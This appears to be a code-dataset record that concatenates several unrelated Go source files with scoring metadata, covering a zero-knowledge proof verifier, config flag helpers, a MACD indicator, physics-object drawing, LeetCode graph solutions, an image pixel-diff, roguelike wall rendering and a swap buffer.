hashNum := common.Hash(alpha1, beta1)
challenge := new(big.Int).Add(hashNum, beta)
challenge.Mod(challenge, verifier.Group.Q)
verifier.challenge = challenge
verifier.transcript = NewTranscript(alpha1, beta1, hashNum, nil)
verifier.alpha = alpha
return challenge
}
// It receives z = r + secret * challenge.
//It returns true if g1^z = g1^r * (g1^secret) ^ challenge and g2^z = g2^r * (g2^secret) ^ challenge.
func (verifier *DLogEqualityBTranscriptVerifier) Verify(z *big.Int) (bool, *Transcript,
*big.Int, *big.Int) {
left1 := verifier.Group.Exp(verifier.g1, z)
left2 := verifier.Group.Exp(verifier.g2, z)
r11 := verifier.Group.Exp(verifier.t1, verifier.challenge)
r12 := verifier.Group.Exp(verifier.t2, verifier.challenge)
right1 := verifier.Group.Mul(r11, verifier.x1)
right2 := verifier.Group.Mul(r12, verifier.x2)
// transcript [(alpha1, beta1), hash(alpha1, beta1), z+alpha]
// however, we are actually returning [alpha1, beta1, hash(alpha1, beta1), z+alpha]
z1 := new(big.Int).Add(z, verifier.alpha)
verifier.transcript.ZAlpha = z1
G2 := verifier.Group.Exp(verifier.g2, verifier.gamma)
T2 := verifier.Group.Exp(verifier.t2, verifier.gamma)
if left1.Cmp(right1) == 0 && left2.Cmp(right2) == 0 {
return true, verifier.transcript, G2, T2
} else {
return false, nil, nil, nil
}
} | crypto/zkp/primitives/dlogproofs/dlog_equality_blinded_transcript.go | 0.654122 | 0.430806 | dlog_equality_blinded_transcript.go | starcoder |
package conf
import "time"
// DurationVar defines a time.Duration flag and environment variable with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the flag and/or environment variable.
func (c *Configurator) DurationVar(p *time.Duration, name string, value time.Duration, usage string) {
c.env().DurationVar(p, name, value, usage)
c.flag().DurationVar(p, name, value, usage)
}
// Duration defines a time.Duration flag and environment variable with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the flag and/or environment variable.
func (c *Configurator) Duration(name string, value time.Duration, usage string) *time.Duration {
p := new(time.Duration)
c.DurationVar(p, name, value, usage)
return p
}
// DurationVarE defines a time.Duration environment variable with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the environment variable.
func (c *Configurator) DurationVarE(p *time.Duration, name string, value time.Duration, usage string) {
c.env().DurationVar(p, name, value, usage)
}
// DurationE defines a time.Duration environment variable with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the environment variable.
func (c *Configurator) DurationE(name string, value time.Duration, usage string) *time.Duration {
p := new(time.Duration)
c.DurationVarE(p, name, value, usage)
return p
}
// DurationVarF defines a time.Duration flag with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the flag.
func (c *Configurator) DurationVarF(p *time.Duration, name string, value time.Duration, usage string) {
c.flag().DurationVar(p, name, value, usage)
}
// DurationF defines a time.Duration flag with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the flag.
func (c *Configurator) DurationF(name string, value time.Duration, usage string) *time.Duration {
p := new(time.Duration)
c.DurationVarF(p, name, value, usage)
return p
}
// DurationVar defines a time.Duration flag and environment variable with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the flag and/or environment variable.
func DurationVar(p *time.Duration, name string, value time.Duration, usage string) {
Global.DurationVar(p, name, value, usage)
}
// Duration defines a time.Duration flag and environment variable with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the flag and/or environment variable.
func Duration(name string, value time.Duration, usage string) *time.Duration {
return Global.Duration(name, value, usage)
}
// DurationVarE defines a time.Duration environment variable with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the environment variable.
func DurationVarE(p *time.Duration, name string, value time.Duration, usage string) {
Global.DurationVarE(p, name, value, usage)
}
// DurationE defines a time.Duration environment variable with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the environment variable.
func DurationE(name string, value time.Duration, usage string) *time.Duration {
return Global.DurationE(name, value, usage)
}
// DurationVarF defines a time.Duration flag with specified name, default value, and usage string.
// The argument p points to a time.Duration variable in which to store the value of the flag.
func DurationVarF(p *time.Duration, name string, value time.Duration, usage string) {
Global.DurationVarF(p, name, value, usage)
}
// DurationF defines a time.Duration flag with specified name, default value, and usage string.
// The return value is the address of a time.Duration variable that stores the value of the flag.
func DurationF(name string, value time.Duration, usage string) *time.Duration {
return Global.DurationF(name, value, usage)
} | value_duration.go | 0.766206 | 0.657909 | value_duration.go | starcoder |
package indicators
import (
"errors"
"github.com/jaybutera/gotrade"
)
// A Moving Average Convergence-Divergence (Macd) Indicator
type Macd struct {
*baseIndicator
*baseFloatBounds
// private variables
valueAvailableAction ValueAvailableActionMacd
fastTimePeriod int
slowTimePeriod int
signalTimePeriod int
emaFast *EmaWithoutStorage
emaSlow *EmaWithoutStorage
emaSignal *EmaWithoutStorage
currentFastEma float64
currentSlowEma float64
currentMacd float64
emaSlowSkip int
selectData gotrade.DOHLCVDataSelectionFunc
// public variables
Macd []float64
Signal []float64
Histogram []float64
}
// NewMacd creates a Moving Average Convergence Divergence Indicator (Macd) for online usage
func NewMacd(fastTimePeriod int, slowTimePeriod int, signalTimePeriod int, selectData gotrade.DOHLCVDataSelectionFunc) (indicator *Macd, err error) {
// the minimum fastTimePeriod for this indicator is 2
if fastTimePeriod < 2 {
return nil, errors.New("fastTimePeriod is less than the minimum (2)")
}
// check the maximum fastTimePeriod
if fastTimePeriod > MaximumLookbackPeriod {
return nil, errors.New("fastTimePeriod is greater than the maximum (100000)")
}
// the minimum slowTimePeriod for this indicator is 2
if slowTimePeriod < 2 {
return nil, errors.New("slowTimePeriod is less than the minimum (2)")
}
// check the maximum slowTimePeriod
if slowTimePeriod > MaximumLookbackPeriod {
return nil, errors.New("slowTimePeriod is greater than the maximum (100000)")
}
// the minimum signalTimePeriod for this indicator is 2
if signalTimePeriod < 1 {
return nil, errors.New("signalTimePeriod is less than the minimum (1)")
}
// check the maximum slowTimePeriod
if signalTimePeriod > MaximumLookbackPeriod {
return nil, errors.New("signalTimePeriod is greater than the maximum (100000)")
}
if selectData == nil {
return nil, ErrDOHLCVDataSelectFuncIsNil
}
lookback := slowTimePeriod + signalTimePeriod - 2
ind := Macd{
baseIndicator: newBaseIndicator(lookback),
baseFloatBounds: newBaseFloatBounds(),
fastTimePeriod: fastTimePeriod,
slowTimePeriod: slowTimePeriod,
signalTimePeriod: signalTimePeriod,
}
// shift the fast ema up so that it has valid data at the same time as the slow emas
ind.emaSlowSkip = slowTimePeriod - fastTimePeriod
ind.emaFast, err = NewEmaWithoutStorage(fastTimePeriod, func(dataItem float64, streamBarIndex int) {
ind.currentFastEma = dataItem
})
ind.emaSlow, err = NewEmaWithoutStorage(slowTimePeriod, func(dataItem float64, streamBarIndex int) {
ind.currentSlowEma = dataItem
ind.currentMacd = ind.currentFastEma - ind.currentSlowEma
ind.emaSignal.ReceiveTick(ind.currentMacd, streamBarIndex)
})
ind.emaSignal, err = NewEmaWithoutStorage(signalTimePeriod, func(dataItem float64, streamBarIndex int) {
// Macd Line: (12-day EmaWithoutStorage - 26-day EmaWithoutStorage)
// Signal Line: 9-day EmaWithoutStorage of Macd Line
// Macd Histogram: Macd Line - Signal Line
macd := ind.currentFastEma - ind.currentSlowEma
signal := dataItem
histogram := macd - signal
ind.UpdateMinMax(macd, macd)
ind.UpdateMinMax(signal, signal)
ind.UpdateMinMax(histogram, histogram)
ind.IncDataLength()
ind.SetValidFromBar(streamBarIndex)
// notify of a new result value though the value available action
ind.valueAvailableAction(macd, signal, histogram, streamBarIndex)
})
ind.selectData = selectData
ind.valueAvailableAction = func(dataItemMacd float64, dataItemSignal float64, dataItemHistogram float64, streamBarIndex int) {
ind.Macd = append(ind.Macd, dataItemMacd)
ind.Signal = append(ind.Signal, dataItemSignal)
ind.Histogram = append(ind.Histogram, dataItemHistogram)
}
return &ind, err
}
// NewDefaultMacd creates a Moving Average Convergence Divergence Indicator (Macd) for online usage with default parameters
// fastTimePeriod - 12
// slowTimePeriod - 26
// signalTimePeriod - 9
func NewDefaultMacd() (indicator *Macd, err error) {
fastTimePeriod := 12
slowTimePeriod := 26
signalTimePeriod := 9
return NewMacd(fastTimePeriod, slowTimePeriod, signalTimePeriod, gotrade.UseClosePrice)
}
// NewMacdWithSrcLen creates a Moving Average Convergence Divergence Indicator (Macd) for offline usage
func NewMacdWithSrcLen(sourceLength uint, fastTimePeriod int, slowTimePeriod int, signalTimePeriod int, selectData gotrade.DOHLCVDataSelectionFunc) (indicator *Macd, err error) {
ind, err := NewMacd(fastTimePeriod, slowTimePeriod, signalTimePeriod, selectData)
// only initialise the storage if there is enough source data to require it
if sourceLength-uint(ind.GetLookbackPeriod()) > 1 {
ind.Macd = make([]float64, 0, sourceLength-uint(ind.GetLookbackPeriod()))
ind.Signal = make([]float64, 0, sourceLength-uint(ind.GetLookbackPeriod()))
ind.Histogram = make([]float64, 0, sourceLength-uint(ind.GetLookbackPeriod()))
}
return ind, err
}
// NewDefaultMacdWithSrcLen creates a Moving Average Convergence Divergence Indicator (Macd) for offline usage with default parameters
func NewDefaultMacdWithSrcLen(sourceLength uint) (indicator *Macd, err error) {
ind, err := NewDefaultMacd()
// only initialise the storage if there is enough source data to require it
if sourceLength-uint(ind.GetLookbackPeriod()) > 1 {
ind.Macd = make([]float64, 0, sourceLength-uint(ind.GetLookbackPeriod()))
ind.Signal = make([]float64, 0, sourceLength-uint(ind.GetLookbackPeriod()))
ind.Histogram = make([]float64, 0, sourceLength-uint(ind.GetLookbackPeriod()))
}
return ind, err
}
// NewMacdForStream creates a Moving Average Convergence Divergence Indicator (Macd) for online usage with a source data stream
func NewMacdForStream(priceStream gotrade.DOHLCVStreamSubscriber, fastTimePeriod int, slowTimePeriod int, signalTimePeriod int, selectData gotrade.DOHLCVDataSelectionFunc) (indicator *Macd, err error) {
ind, err := NewMacd(fastTimePeriod, slowTimePeriod, signalTimePeriod, selectData)
priceStream.AddTickSubscription(ind)
return ind, err
}
// NewDefaultMacdForStream creates a Moving Average Convergence Divergence Indicator (Macd) for online usage with a source data stream
func NewDefaultMacdForStream(priceStream gotrade.DOHLCVStreamSubscriber) (indicator *Macd, err error) {
ind, err := NewDefaultMacd()
priceStream.AddTickSubscription(ind)
return ind, err
}
// NewMacdForStreamWithSrcLen creates a Moving Average Convergence Divergence Indicator (Macd) for offline usage with a source data stream
func NewMacdForStreamWithSrcLen(sourceLength uint, priceStream gotrade.DOHLCVStreamSubscriber, fastTimePeriod int, slowTimePeriod int, signalTimePeriod int, selectData gotrade.DOHLCVDataSelectionFunc) (indicator *Macd, err error) {
ind, err := NewMacdWithSrcLen(sourceLength, fastTimePeriod, slowTimePeriod, signalTimePeriod, selectData)
priceStream.AddTickSubscription(ind)
return ind, err
}
// NewDefaultMacdForStreamWithSrcLen creates a Moving Average Convergence Divergence Indicator (Macd) for offline usage with a source data stream
func NewDefaultMacdForStreamWithSrcLen(sourceLength uint, priceStream gotrade.DOHLCVStreamSubscriber) (indicator *Macd, err error) {
ind, err := NewDefaultMacdWithSrcLen(sourceLength)
priceStream.AddTickSubscription(ind)
return ind, err
}
// ReceiveDOHLCVTick consumes a source data DOHLCV price tick
func (ind *Macd) ReceiveDOHLCVTick(tickData gotrade.DOHLCV, streamBarIndex int) {
var selectedData = ind.selectData(tickData)
ind.ReceiveTick(selectedData, streamBarIndex)
}
func (ind *Macd) ReceiveTick(tickData float64, streamBarIndex int) {
if streamBarIndex > ind.emaSlowSkip {
ind.emaFast.ReceiveTick(tickData, streamBarIndex)
}
ind.emaSlow.ReceiveTick(tickData, streamBarIndex)
} | indicators/macd.go | 0.73412 | 0.560914 | macd.go | starcoder |
package pixelmunk
import (
"fmt"
"github.com/faiface/pixel"
"github.com/faiface/pixel/imdraw"
"github.com/vova616/chipmunk"
"golang.org/x/image/colornames"
"math"
)
var _ Drawable = &Object{}
// NewObject creates a new Object for the provided Body and ObjectOptions
func NewObject(body *chipmunk.Body, options ObjectOptions) Object {
return Object{
body: body,
options: options,
}
}
// NewObjectWithShape creates a new Object for the provided Shape and ObjectOptions
func NewObjectWithShape(shape *chipmunk.Shape, options ObjectOptions) Object {
shape.SetElasticity(options.BodyOptions.Elasticity)
shape.SetFriction(options.BodyOptions.Friction)
var body *chipmunk.Body
if options.BodyOptions.StaticBody {
body = chipmunk.NewBodyStatic()
} else {
body = chipmunk.NewBody(options.BodyOptions.Mass, shape.Moment(float32(options.BodyOptions.Mass)))
}
body.AddShape(shape)
body.SetPosition(options.BodyOptions.Position)
body.SetVelocity(float32(options.BodyOptions.Velocity.X), float32(options.BodyOptions.Velocity.Y))
body.SetAngle(options.BodyOptions.Angle)
return Object{
body: body,
options: options,
}
}
// GetBody returns the chipmunk.Body that the Object represents
func (o Object) GetBody() *chipmunk.Body {
return o.body
}
// GetOptions returns the ObjectOptions that were used to create the Object
func (o Object) GetOptions() ObjectOptions {
return o.options
}
// Draw draws the Object on the provided imdraw.IMDraw
func (o Object) Draw(imd *imdraw.IMDraw) {
for _, shape := range o.GetBody().Shapes {
switch shape.ShapeType() {
case chipmunk.ShapeType_Circle:
o.drawCircle(imd, shape)
case chipmunk.ShapeType_Box:
o.drawBox(imd, shape)
default:
panic(fmt.Sprintf("unsupported shape type: %d", shape.ShapeType()))
}
for _, customDrawFunc := range o.options.CustomDrawFunc {
customDrawFunc(&o, imd)
}
}
}
func (o Object) drawCircle(imd *imdraw.IMDraw, shape *chipmunk.Shape) {
lower := shape.BB.Lower
upper := shape.BB.Upper
radius := shape.GetAsCircle().Radius
position := pixel.V(
float64(lower.X+upper.X)/2,
float64(lower.Y+upper.Y)/2,
)
imd.Color = o.options.Color
imd.Push(position)
imd.Circle(float64(radius), o.options.Thickness)
}
func (o Object) drawBox(imd *imdraw.IMDraw, shape *chipmunk.Shape) {
lower := shape.BB.Lower
upper := shape.BB.Upper
angle := float64(shape.Body.Angle())
box := shape.GetAsBox()
width := float64(box.Width)
height := float64(box.Height)
for angle > math.Pi {
angle -= math.Pi
}
l := width
if angle > math.Pi/2 {
angle -= math.Pi / 2
l = height
}
sin, cos := math.Sincos(angle)
corners := []pixel.Vec{
pixel.V(float64(upper.X)-l*cos, float64(lower.Y)),
pixel.V(float64(upper.X), float64(lower.Y)+l*sin),
pixel.V(float64(lower.X)+l*cos, float64(upper.Y)),
pixel.V(float64(lower.X), float64(upper.Y)-l*sin),
}
const debug = false
if debug {
imd.Color = colornames.White
imd.Push(pixel.V(float64(lower.X), float64(lower.Y)))
imd.Push(pixel.V(float64(upper.X), float64(upper.Y)))
imd.Rectangle(0)
}
imd.Color = o.options.Color
imd.Push(corners...)
imd.Polygon(o.options.Thickness)
} | object.go | 0.732687 | 0.429489 | object.go | starcoder |
package main
import (
. "github.com/9d77v/leetcode/pkg/algorithm/unionfind"
)
/*
题目:除法求值
给你一个变量对数组 equations 和一个实数值数组 values 作为已知条件,其中 equations[i] = [Ai, Bi] 和 values[i] 共同表示等式 Ai / Bi = values[i] 。每个 Ai 或 Bi 是一个表示单个变量的字符串。
另有一些以数组 queries 表示的问题,其中 queries[j] = [Cj, Dj] 表示第 j 个问题,请你根据已知条件找出 Cj / Dj = ? 的结果作为答案。
返回 所有问题的答案 。如果存在某个无法确定的答案,则用 -1.0 替代这个答案。
注意:输入总是有效的。你可以假设除法运算中不会出现除数为 0 的情况,且不存在任何矛盾的结果。
提示:
1 <= equations.length <= 20
equations[i].length == 2
1 <= Ai.length, Bi.length <= 5
values.length == equations.length
0.0 < values[i] <= 20.0
1 <= queries.length <= 20
queries[i].length == 2
1 <= Cj.length, Dj.length <= 5
Ai, Bi, Cj, Dj 由小写英文字母与数字组成
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/evaluate-division
*/
/*
方法一:广度优先搜索
时间复杂度:О(ML+Q⋅(L+M))
空间复杂度:О(NL+M)
运行时间:0 ms 内存消耗:2.1 MB
*/
func calcEquationFunc1(equations [][]string, values []float64, queries [][]string) []float64 {
idMap := buildIDMap(equations)
graph := buildEdgeGraph(idMap, equations, values)
res := make([]float64, len(queries))
for i, q := range queries {
start, hasS := idMap[q[0]]
end, hasE := idMap[q[1]]
if !hasS || !hasE {
res[i] = -1
} else {
res[i] = bfs(graph, start, end)
}
}
return res
}
func buildIDMap(equations [][]string) map[string]int {
idMap := make(map[string]int, 2*len(equations))
for _, eq := range equations {
a, b := eq[0], eq[1]
if _, has := idMap[a]; !has {
idMap[a] = len(idMap)
}
if _, has := idMap[b]; !has {
idMap[b] = len(idMap)
}
}
return idMap
}
func buildEdgeGraph(idMap map[string]int, equations [][]string, values []float64) [][]edge {
graph := make([][]edge, len(idMap))
for i, eq := range equations {
v, w := idMap[eq[0]], idMap[eq[1]]
graph[v] = append(graph[v], edge{w, values[i]})
graph[w] = append(graph[w], edge{v, 1 / values[i]})
}
return graph
}
type edge struct {
to int
weight float64
}
func bfs(graph [][]edge, start, end int) float64 {
ratios := make([]float64, len(graph))
ratios[start] = 1
queue := []int{start}
for len(queue) > 0 {
v := queue[0]
queue = queue[1:]
if v == end {
return ratios[v]
}
for _, e := range graph[v] {
if w := e.to; ratios[w] == 0 {
ratios[w] = ratios[v] * e.weight
queue = append(queue, w)
}
}
}
return -1
}
/*
方法二:flyod算法
时间复杂度:О(ML+N^3+QL)
空间复杂度:О(NL+N^2)
运行时间:0 ms 内存消耗:2.1 MB
*/
func calcEquationFunc2(equations [][]string, values []float64, queries [][]string) []float64 {
idMap := buildIDMap(equations)
graph := buildGraph(idMap, equations, values)
flyod(graph)
res := make([]float64, len(queries))
for i, q := range queries {
start, hasS := idMap[q[0]]
end, hasE := idMap[q[1]]
if !hasS || !hasE || graph[start][end] == 0 {
res[i] = -1
} else {
res[i] = graph[start][end]
}
}
return res
}
func buildGraph(idMap map[string]int, equations [][]string, values []float64) [][]float64 {
graph := make([][]float64, len(idMap))
for i := range graph {
graph[i] = make([]float64, len(idMap))
}
for i, eq := range equations {
v, w := idMap[eq[0]], idMap[eq[1]]
graph[v][w] = values[i]
graph[w][v] = 1 / values[i]
}
return graph
}
func flyod(graph [][]float64) {
for k := range graph {
for i := range graph {
for j := range graph {
if graph[i][k] > 0 && graph[k][j] > 0 {
graph[i][j] = graph[i][k] * graph[k][j]
}
}
}
}
}
/*
方法三:并查集
时间复杂度:О(ML+N+MlogN+Q⋅(L+logN))
空间复杂度:О(NL)
运行时间:0 ms 内存消耗:2.1 MB
*/
func calcEquationFunc3(equations [][]string, values []float64, queries [][]string) []float64 {
equationsSize := len(equations)
unionFind := NewWeightUnionFind(2 * equationsSize)
idMap := make(map[string]int, 2*equationsSize)
for i, equation := range equations {
a, b := equation[0], equation[1]
if _, has := idMap[a]; !has {
idMap[a] = len(idMap)
}
if _, has := idMap[b]; !has {
idMap[b] = len(idMap)
}
unionFind.Union(idMap[a], idMap[b], values[i])
}
res := make([]float64, len(queries))
for i, q := range queries {
id1, hasS := idMap[q[0]]
id2, hasE := idMap[q[1]]
if !hasS || !hasE {
res[i] = -1
} else {
res[i] = unionFind.IsConnected(id1, id2)
}
}
return res
} | internal/leetcode/399.evaluate-division/main.go | 0.54359 | 0.416441 | main.go | starcoder |
package pixel
import (
"image"
"image/color"
)
type Option struct {
Threshold float32
IncludeAA bool
}
func Match(img1, img2 image.Image, rect image.Rectangle, output *image.RGBA, opt *Option) int {
var threshold float32
threshold = 0.1
if opt != nil {
threshold = opt.Threshold
}
maxDelta := 35215 * threshold * threshold
diff := 0
includeAA := false
if opt != nil {
includeAA = opt.IncludeAA
}
for y := rect.Min.Y; y < rect.Max.Y; y++ {
for x := rect.Min.X; x < rect.Max.X; x++ {
pos := image.Point{X: x, Y: y}
delta := colorDelta(img1, img2, pos, pos, false)
if delta > maxDelta {
if !includeAA && (antialiased(img1, img2, x, y, rect.Max.X, rect.Max.Y) || antialiased(img2, img1, x, y, rect.Max.X, rect.Max.Y)) {
if output != nil {
drawPixel(output, pos, color.RGBA{255, 255, 0, 255})
}
} else {
if output != nil {
drawPixel(output, pos, color.RGBA{255, 0, 0, 255})
}
diff++
}
} else if output != nil {
val := blend2(grayPixel(img1, pos), 0.1)
v := uint8(val)
drawPixel(output, pos, color.RGBA{v, v, v, 255})
}
}
}
return diff
}
func colorDelta(img1, img2 image.Image, k, m image.Point, yOnly bool) float32 {
color1 := img1.At(k.X, k.Y)
color2 := img2.At(m.X, m.Y)
red1, green1, blue1, alpha1 := color1.RGBA()
red1 = red1 >> 8
green1 = green1 >> 8
blue1 = blue1 >> 8
alpha1 = alpha1 >> 8
red2, green2, blue2, alpha2 := color2.RGBA()
red2 = red2 >> 8
green2 = green2 >> 8
blue2 = blue2 >> 8
alpha2 = alpha2 >> 8
a1 := alpha1 / 255
a2 := alpha2 / 255
r1 := blend(red1, a1)
g1 := blend(green1, a1)
b1 := blend(blue1, a1)
r2 := blend(red2, a2)
g2 := blend(green2, a2)
b2 := blend(blue2, a2)
y := rgb2y(r1, g1, b1) - rgb2y(r2, g2, b2)
if yOnly {
return y
}
i := rgb2i(r1, g1, b1) - rgb2i(r2, g2, b2)
q := rgb2q(r1, g1, b1) - rgb2q(r2, g2, b2)
return 0.5053*y*y + 0.299*i*i + 0.1957*q*q
}
func blend(c, a uint32) float32 {
return float32(255 + (c-255)*a)
}
func blend2(c, a float32) float32 {
return 255 + (c-255)*a
}
func rgb2y(r, g, b float32) float32 {
return r*0.29889531 + g*0.58662247 + b*0.11448223
}
func rgb2i(r, g, b float32) float32 {
return r*0.59597799 - g*0.27417610 - b*0.32180189
}
func rgb2q(r, g, b float32) float32 {
return r*0.21147017 - g*0.52261711 + b*0.31114694
}
func antialiased(imgA, imgB image.Image, x1, y1, w, h int) bool {
x0 := max(x1-1, 0)
y0 := max(y1-1, 0)
x2 := min(x1+1, w-1)
y2 := min(y1+1, h-1)
pos := image.Point{X: x1, Y: y1}
var zeroes, positives, negatives int
var minX, minY, maxX, maxY int
var _min, _max float32
for x := x0; x <= x2; x++ {
for y := y0; y <= y2; y++ {
if x == x1 && y == y1 {
continue
}
delta := colorDelta(imgA, imgA, pos, image.Point{X: x, Y: y}, true)
if delta == 0 {
zeroes++
} else if delta > 0 {
positives++
} else if delta < 0 {
negatives++
}
if zeroes > 2 {
return false
}
if imgB == nil {
continue
}
if delta < _min {
_min = delta
minX = x
minY = y
}
if delta > _max {
_max = delta
maxX = x
maxY = y
}
}
}
if imgB == nil {
return true
}
if negatives == 0 || positives == 0 {
return false
}
return (!antialiased(imgA, nil, minX, minY, w, h) && !antialiased(imgB, nil, minX, minY, w, h)) ||
(!antialiased(imgA, nil, maxX, maxY, w, h) && !antialiased(imgB, nil, maxX, maxY, w, h))
}
func min(x, y int) int {
if x < y {
return x
}
return y
}
func max(x, y int) int {
if x > y {
return x
}
return y
}
func grayPixel(img image.Image, pos image.Point) float32 {
c := img.At(pos.X, pos.Y)
red, green, blue, alpha := c.RGBA()
red = red >> 8
green = green >> 8
blue = blue >> 8
alpha = alpha >> 8
a := alpha / 255
r := blend(red, a)
g := blend(green, a)
b := blend(blue, a)
return rgb2y(r, g, b)
}
func drawPixel(img *image.RGBA, pos image.Point, color color.Color) {
img.Set(pos.X, pos.Y, color)
} | pixel.go | 0.720368 | 0.469399 | pixel.go | starcoder |
package canfinish
/*
* @lc app=leetcode id=207 lang=golang
*
* [207] Course Schedule
*
* https://leetcode.com/problems/course-schedule/description/
*
* algorithms
* Medium (37.19%)
* Total Accepted: 208.1K
* Total Submissions: 554.5K
* Testcase Example: '2\n[[1,0]]'
*
* There are a total of n courses you have to take, labeled from 0 to n-1.
*
* Some courses may have prerequisites, for example to take course 0 you have
* to first take course 1, which is expressed as a pair: [0,1]
*
* Given the total number of courses and a list of prerequisite pairs, is it
* possible for you to finish all courses?
*
* Example 1:
*
*
* Input: 2, [[1,0]]
* Output: true
* Explanation: There are a total of 2 courses to take.
* To take course 1 you should have finished course 0. So it is possible.
*
* Example 2:
*
*
* Input: 2, [[1,0],[0,1]]
* Output: false
* Explanation: There are a total of 2 courses to take.
* To take course 1 you should have finished course 0, and to take course 0 you
* should
* also have finished course 1. So it is impossible.
*
*
* Note:
*
*
* The input prerequisites is a graph represented by a list of edges, not
* adjacency matrices. Read more about how a graph is represented.
* You may assume that there are no duplicate edges in the input
* prerequisites.
*
*
*/
// kahn算法
func canFinish(numCourses int, prerequisites [][]int) bool {
if prerequisites == nil || len(prerequisites) < 2 {
return true
}
inDegreeZero := make([]bool, numCourses, numCourses)
for i := range inDegreeZero {
inDegreeZero[i] = true
}
for _, v := range prerequisites {
inDegreeZero[v[1]] = false
}
inDegreeZeroNumbers := make([]int, 0)
newInDegreeZeroNumbers := make([]int, 0)
for i, v := range inDegreeZero {
if v {
inDegreeZeroNumbers = append(inDegreeZeroNumbers, i)
}
}
for len(inDegreeZeroNumbers) > 0 {
newInDegreeZeroNumbers = newInDegreeZeroNumbers[0:0]
for _, n := range inDegreeZeroNumbers {
endPoints := deleteEdge(&prerequisites, n)
for _, v := range endPoints {
if isZeroInDegree(prerequisites, v) {
inDegreeZero[v] = true
newInDegreeZeroNumbers = append(newInDegreeZeroNumbers, v)
}
}
}
newInDegreeZeroNumbers, inDegreeZeroNumbers = inDegreeZeroNumbers, newInDegreeZeroNumbers
}
for _, v := range inDegreeZero {
if !v {
return false
}
}
return true
}
func isZeroInDegree(prerequisites [][]int, number int) bool {
for _, v := range prerequisites {
if v[1] == number {
return false
}
}
return true
}
func deleteEdge(prerequisites *[][]int, start int) (endPoint []int) {
mark := make([]int, 0)
for i, v := range *prerequisites {
if v[0] == start {
mark = append(mark, i)
}
}
for i := len(mark) - 1; i >= 0; i-- {
endPoint = append(endPoint, (*prerequisites)[mark[i]][1])
*prerequisites = append(append([][]int{}, (*prerequisites)[:mark[i]]...), (*prerequisites)[mark[i]+1:]...)
}
return
} | 207-canfinish/207.course-schedule.go | 0.823186 | 0.53965 | 207.course-schedule.go | starcoder |
package wallify
import (
"image"
)
type Wallifier interface {
IsWallable(p image.Point) bool
IsSeen(p image.Point) bool
}
/*
Wallify determins the type of wall rune to use for a given cell.
A bitmask of its neighbors is made:
1
8#2
4
The bit is set if the corresponding neighbor IsWallable.
For the given bitmask, the corresponding rune index is found in the wallRune slice.
This rune index is then found in the provided runes slice, which can be,
say, SingleWall or DoubleWall, and these contain the rune code to be returned.
Normally, if the entire level is discovered (IsSeen), this would be enough.
However, if this is all we do, T-shapes and Cross-shapes cause problems
if one of the blocks adjacent to a T or Cross has not yet been discovered. Consider:
│
├─
│
If the lower straight wall has not yet been discovered, then the fact that the
corner is a T-shape rather than a corner-shape gives away the fact that there is a
wall on the other side.
To fix this, if the first step results in a cross or a T, we create a visibility mask
of whether the cell's neighbors are visible, and AND it with the bitmask.
This works for most situations, except when not a single neighbor has been seen;
this would result in a pillar, which would turn into a wall when neighbors are
later discovered. This looks terrible.
So, in order to fix this, if the retuls of step 2 is a pillar, we try to fit one
of the invisiWall elements to the mask, which contains only straight walls and corners.
Only if we can't fit any of these, a pillar is probably right.
*/
//var singleWall = []int{79, 179, 196, 192, 218, 191, 217, 195, 194, 180, 193, 197}
//var singleWall = []int{9, 179, 196, 192, 218, 191, 217, 195, 194, 180, 193, 197}
var SingleWall = []int{233, 179, 196, 192, 218, 191, 217, 195, 194, 180, 193, 197}
var DoubleWall = []int{233, 186, 205, 200, 201, 187, 188, 204, 203, 185, 202, 206}
var wallRune = []int{0, 1, 2, 3, 1, 1, 4, 7, 2, 6, 2, 10, 5, 9, 8, 11}
var invisiWall = []int{5, 10, 3, 6, 12, 9, 1, 2, 4, 8}
func Wallify(w Wallifier, p image.Point, runes []int) int {
x := image.Point{X: 1}
y := image.Point{Y: 1}
bits := 0
if w.IsWallable(p.Sub(y)) {
bits |= 1
}
if w.IsWallable(p.Add(x)) {
bits |= 2
}
if w.IsWallable(p.Add(y)) {
bits |= 4
}
if w.IsWallable(p.Sub(x)) {
bits |= 8
}
switch bits {
case 7, 14, 13, 11, 15:
// Cross or T-shape; check visibility
visibits := 0
if w.IsWallable(p.Sub(y)) && w.IsSeen(p.Sub(y)) {
visibits |= 1
}
if w.IsWallable(p.Add(x)) && w.IsSeen(p.Add(x)) {
visibits |= 2
}
if w.IsWallable(p.Add(y)) && w.IsSeen(p.Add(y)) {
visibits |= 4
}
if w.IsWallable(p.Sub(x)) && w.IsSeen(p.Sub(x)) {
visibits |= 8
}
if visibits&bits == 0 {
// No neighbors are visible, which would result in a pillar.
// Instead, try to fit one of the non-T, non-cross shapes.
for _, iw := range invisiWall {
if bits&visibits&iw == iw {
bits = iw
break
}
}
} else {
bits = bits & visibits
}
}
return runes[wallRune[bits]]
} | roguelike/wallify/wallify.go | 0.507568 | 0.522872 | wallify.go | starcoder |
package buffer
import (
"encoding/gob"
"io"
)
type swap struct {
A BufferAt
B BufferAt
}
// NewSwap creates a Buffer which writes to a until you write past a.Cap()
// then it io.Copy's from a to b and writes to b.
// Once the Buffer is empty again, it starts over writing to a.
// Note that if b.Cap() <= a.Cap() it will cause a panic, b is expected
// to be larger in order to accommodate writes past a.Cap().
func NewSwap(a, b Buffer) Buffer {
return NewSwapAt(toBufferAt(a), toBufferAt(b))
}
// NewSwapAt creates a BufferAt which writes to a until you write past a.Cap()
// then it io.Copy's from a to b and writes to b.
// Once the Buffer is empty again, it starts over writing to a.
// Note that if b.Cap() <= a.Cap() it will cause a panic, b is expected
// to be larger in order to accommodate writes past a.Cap().
func NewSwapAt(a, b BufferAt) BufferAt {
if b.Cap() <= a.Cap() {
panic("Buffer b must be larger than a.")
}
return &swap{A: a, B: b}
}
func (buf *swap) Len() int64 {
return buf.A.Len() + buf.B.Len()
}
func (buf *swap) Cap() int64 {
return buf.B.Cap()
}
